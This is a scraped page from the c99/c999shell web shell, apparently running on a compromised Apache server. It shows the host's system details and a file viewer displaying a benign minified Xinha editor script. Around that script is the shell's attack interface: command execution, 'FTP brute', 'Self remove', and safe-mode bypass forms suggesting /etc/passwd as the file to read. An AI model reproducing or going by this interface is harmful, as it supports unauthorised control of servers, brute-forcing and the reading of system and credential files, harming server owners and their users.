!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/mailboxes/xinha/modules/GetHtml/   drwxr-xr-x
Free 50.74 GB of 127.8 GB (39.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     TransformInnerHTML.js (4.9 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* This compressed file is part of Xinha. For uncompressed sources, forum, and bug reports, go to xinha.org */
/* This file is part of version 0.96beta2 released Fri, 20 Mar 2009 11:01:14 +0100 */
function GetHtmlImplementation(a){this.editor=a}GetHtmlImplementation._pluginInfo={name:"GetHtmlImplementation TransformInnerHTML",version:"1.0",developer:"Nelson Bright",developer_url:"http://www.brightworkweb.com/",sponsor:"",sponsor_url:"",license:"htmlArea"};Xinha.RegExpCache=[/<\s*\/?([^\s\/>]+)[\s*\/>]/gi,/(\s+)_moz[^=>]*=[^\s>]*/gi,/\s*=\s*(([^'"][^>\s]*)([>\s])|"([^"]+)"|'([^']+)')/g,/\/>/g,/<(br|hr|img|input|link|meta|param|embed|area)((\s*\S*="[^"]*")*)>/g,/(<\w+\s+(\w*="[^"]*"\s+)*)(checked|compact|declare|defer|disabled|ismap|multiple|no(href|resize|shade|wrap)|readonly|selected)([\s>])/gi,/(="[^']*)'([^'"]*")/,/&(?=(?!(#[0-9]{2,5};|[a-zA-Z0-9]{2,6};|#x[0-9a-fA-F]{2,4};))[^<]*>)/g,/<\s+/g,/\s+(\/)?>/g,/\s{2,}/g,/\s+([^=\s]+)((="[^"]+")|([\s>]))/g,/\s+contenteditable(=[^>\s\/]*)?/gi,/((href|src)=")([^\s]*)"/g,/<\/?(div|p|h[1-6]|table|tr|td|th|ul|ol|li|dl|dt|dd|blockquote|object|br|hr|img|embed|param|pre|script|html|head|body|meta|link|title|area|input|form|textarea|select|option)[^>]*>/g,/<\/(div|p|h[1-6]|table|tr|ul|ol|dl|blockquote|object|html|head|body|script|form|select)( [^>]*)?>/g,/<(div|p|h[1-6]|table|tr|ul|ol|dl|blockquote|object|html|head|body|script|form|select)( [^>]*)?>/g,/<(td|th|li|dt|dd|option|br|hr|embed|param|pre|meta|link|title|area|input|textarea)[^>]*>/g,/(^|<\/(pre|script)>)(\s|[^\s])*?(<(pre|script)[^>]*>|$)/g,/(<pre[^>]*>)([\s\S])*?(<\/pre>)/g,/(^|<!--[\s\S]*?-->)([\s\S]*?)(?=<!--[\s\S]*?-->|$)/g,/\S*=""/g,/<!--[\s\S]*?-->|<\?[\s\S]*?\?>|<\/?\w[^>]*>/g,/(^|<\/script>)[\s\S]*?(<script[^>]*>|$)/g];if(typeof RegExp.prototype.compile=="function"){for(var i=0;i<Xinha.RegExpCache.length;i++){Xinha.RegExpCache[i]=new RegExp().compile(Xinha.RegExpCache[i])}}Xinha.prototype.cleanHTML=function(b){var d=Xinha.RegExpCache;b=b.replace(d[0],function(c){return c.toLowerCase()}).replace(d[1]," ").replace(d[12]," ").replace(d[2],'="$2$4$5"$3').replace(d[21]," ").replace(d[11],function(f,e,c){return" "+e.toLowerCase()+c}).replace(d[3],">").replace(d[9],"$1>").replace(d[5],'$1$3="$3"$5').replace(d[4],"<$1$2 />").replace(d[6],"$1$2").replace(d[7],"&amp;").replace(d[8],"<").replace(d[10]," ");if(Xinha.is_ie&&d[13].test(b)){b=b.replace(d[13],"$1"+Xinha._escapeDollars(stripBaseURL(RegExp.$3))+'"')}if(this.config.only7BitPrintablesInURLs){if(Xinha.is_ie){d[13].test(b)}if(d[13].test(b)){try{b=b.replace(d[13],"$1"+Xinha._escapeDollars(decodeURIComponent(RegExp.$3).replace(/([^!-~]+)/g,function(c){return escape(c)}))+'"')}catch(a){b=b.replace(d[13],Xinha._escapeDollars("$1"+RegExp.$3.replace(/([^!-~]+)/g,function(c){return escape(c)})+'"'))}}}return b};Xinha.indent=function(a,b){Xinha.__nindent=0;Xinha.__sindent="";Xinha.__sindentChar=(typeof b=="undefined")?"  ":b;var d=Xinha.RegExpCache;if(Xinha.is_gecko){a=a.replace(d[19],function(c){return c.replace(/<br \/>/g,"\n")})}a=a.replace(d[18],function(c){c=c.replace(d[20],function(f,e,g){string=g.replace(/[\n\r]/gi," ").replace(/\s+/gi," ").replace(d[14],function(l){if(l.match(d[16])){var k="\n"+Xinha.__sindent+l;Xinha.__sindent+=Xinha.__sindentChar;++Xinha.__nindent;return k}else{if(l.match(d[15])){--Xinha.__nindent;Xinha.__sindent="";for(var h=Xinha.__nindent;h>0;--h){Xinha.__sindent+=Xinha.__sindentChar}return"\n"+Xinha.__sindent+l}else{if(l.match(d[17])){return"\n"+Xinha.__sindent+l}}}return l});return e+string});return c});a=a.replace(/^\s*/,"").replace(/ +\n/g,"\n").replace(/[\r\n]+(\s+)<\/script>/g,"\n$1<\/script>");return a};Xinha.getHTML=function(k,e,g){var f="";var h=Xinha.RegExpCache;if(k.nodeType==11){var d=document.createElement("div");var p=k.insertBefore(d,k.firstChild);for(j=p.nextSibling;j;j=j.nextSibling){p.appendChild(j.cloneNode(true))}f+=p.innerHTML.replace(h[23],function(a){a=a.replace(h[22],function(c){if(/^<[!\?]/.test(c)){return c}else{return g.cleanHTML(c)}});return a})}else{var n=(k.nodeType==1)?k.tagName.toLowerCase():"";if(e){f+="<"+n;var o=k.attributes;for(i=0;i<o.length;++i){var l=o.item(i);if(!l.specified){continue}var b=l.nodeName.toLowerCase();var m=l.nodeValue;f+=" "+b+'="'+m+'"'}f+=">"}if(n=="html"){innerhtml=g._doc.documentElement.innerHTML}else{innerhtml=k.innerHTML}f+=innerhtml.replace(h[23],function(a){a=a.replace(h[22],function(c){if(/^<[!\?]/.test(c)){return c}else{if(!(g.config.htmlRemoveTags&&g.config.htmlRemoveTags.test(c.replace(/<([^\s>\/]+)/,"$1")))){return g.cleanHTML(c)}else{return""}}});return a});if(Xinha.is_ie){f=f.replace(/<(li|dd|dt)( [^>]*)?>/g,"</$1><$1$2>").replace(/(<[uod]l[^>]*>[\s\S]*?)<\/(li|dd|dt)>/g,"$1").replace(/\s*<\/(li|dd|dt)>(\s*<\/(li|dd|dt)>)+/g,"</$1>").replace(/(<dt[\s>][\s\S]*?)(<\/d[dt]>)+/g,"$1</dt>")}if(Xinha.is_gecko){f=f.replace(/<br \/>\n$/,"")}f=f.replace(/\s*(<\/(li|dd|dt)>)/g,"$1");if(e){f+="</"+n+">"}f=Xinha.indent(f)}return f};Xinha._escapeDollars=function(a){return a.replace(/\$/g,"$$$$")};

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0099 ]--